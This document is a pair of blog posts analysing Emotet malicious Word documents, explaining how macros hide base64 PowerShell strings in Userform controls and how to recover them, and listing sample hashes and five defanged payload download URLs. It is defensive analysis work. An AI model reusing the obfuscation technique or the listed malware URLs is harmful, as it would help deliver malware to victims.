Emotet (2020-07-21): Still Making Use of Userforms

DISCLAIMER: Today’s sample is not overly complicated at all. Making use of Userforms is nothing new. Also, anyone can toss an Emotet document into Any.run in order to grab the base64 encoded Powershell string being executed.

Yet, malicious documents are hiding commands that must be run on the system in some way. Finding those locations and understanding how they work can help us better understand the techniques, tactics, and procedures (TTPs) of attackers.

Sample: https://app.any.run/tasks/475e4427-efd3-40c6-a19f-8703552d0194
MD5: 6f6987737db0575b978f60be457cd374
SHA256: 12A9D51F23B64A1C6DC2146C8325AD73C6810CCDA73586EEF181C4CDDB309A99

Where We’ve Been

If you are familiar with the typical behavior of an Emotet document at all, you expect WINWORD.exe or WmiPrvSE.exe to spawn powershell.exe and pass it a big string of base64 encoded text. That base64 string decodes to a variety of commands that attempt to download an .exe from one of five URLs.

Yet, where does that string live in the malicious document? Sometimes it is scattered all over the the macro before it gets concatenated. Here’s an emotet sample from February 2019. It is quite easy to see how the powershell command and the base64 string get assembled.

At other times, the macro references and grabs strings from a Userform. In this example from May 2019, we see two Userforms named F82063 and N9_9818.

Can someone ask Microsoft to give Snip & Sketch the ability to draw straight lines?

Notice how the macro references components within that Userform. While we can see only one empty box within the Userform above, there are really a stack of them on top of each other. They each have their own name and contain some sort of text. Again, it is not too difficult to see how they will get rearranged into the familiar “powershell -e JAB…”

Where We Are Today

Emotet documents are still making use of Userforms, but with a minor twist. In this sample, the long string is brought back into the macro, split apart, and then joined to create the “powershell -e JAB…” string.

These are all of the components in the Userform named woicroib. It contains a variety of ComboBoxes, Frames, and even a MultiPage.

This macro line below references the Userform containing the the encoded text. woicroib is the name of the Userform. raopfeukchaup is a MultiPage component within the Userform. raopfeukchaup contains two pages. The ControlTipText is then grabbed from the second page. However, it looks like that box is empty.

But this is not the case. If we put a cursor in there, select all of it (ctrl + A) and then copy (ctrl + C) and paste it in notepad, we get this giant string. How is it going to be used in the macro?

Returning back to the macro, the above string is tossed into variable io (line 66). This becomes the parameter used in function chiexbeachjeuhkiam (lines 69 and 49). The entire string above is split (line 53) on another string of characters and then joined back together in line 59.

We can emulate this behavior quite easily. Within our notepad document, we can do a simple search for the string in line 53 above and when we replace all of them with nothing…

… we get the powershell string!

And as my calculus teacher in college used to say, we’ve reduced this to a previously solved problem.

Thanks for reading!

Emotet! (09-16-2019) – Document Analysis

jamesbrown2.jpg

No, not like James Brown, but after a long summer of lounging by the Black Sea, Emotet has started spamming once again. I’ll be working off of this document here.


Using OfficeMalScanner, we can rip out the macros from the document. We can see the typical Sub autoopen() kicking things off. Looking through the code we can see it creating objects and sewing various variables together.

Emotet3.png

Opening the document, we can see the new document theme. It’s from here that we can step through the macros and see how they’re all working together.Emotet2.png

While it can be interesting to step through the document, I’ve explained how to do that on this blog before. I created a stripped down version where I pulled out the main pieces of code that actually do anything. The “powershell -enco…” string is in green. wpLnXI starts WmiPrvSE.exe which calls up powershell in turn.

Emotet.png

So while the macro has changed up a bit since last spring, the encoded powershell certainly hasn’t. Let’s decode that base-64 code using CyberChef.

Emotet4.png

Once again, this is not overly complicated. After you’ve undone the base-64 string, use Remove null bytes to clean it up. Split and Extract URLs will complete the job and you ought to be good to go!

hxxp://think1.com/wp-content/upgrade/2na4-4q5g-751619964/
hxxp://broadpeakdefense.com/fbsgf/McZcBMeM/
hxxps://lecairtravels.com/wp-admin/bXwjcdeg/
hxxps://www.biyunhui.com/fj/wbTKndf/
hxxp://nautcoins.com/wp-includes/AcZxFxQ/

Thanks for reading.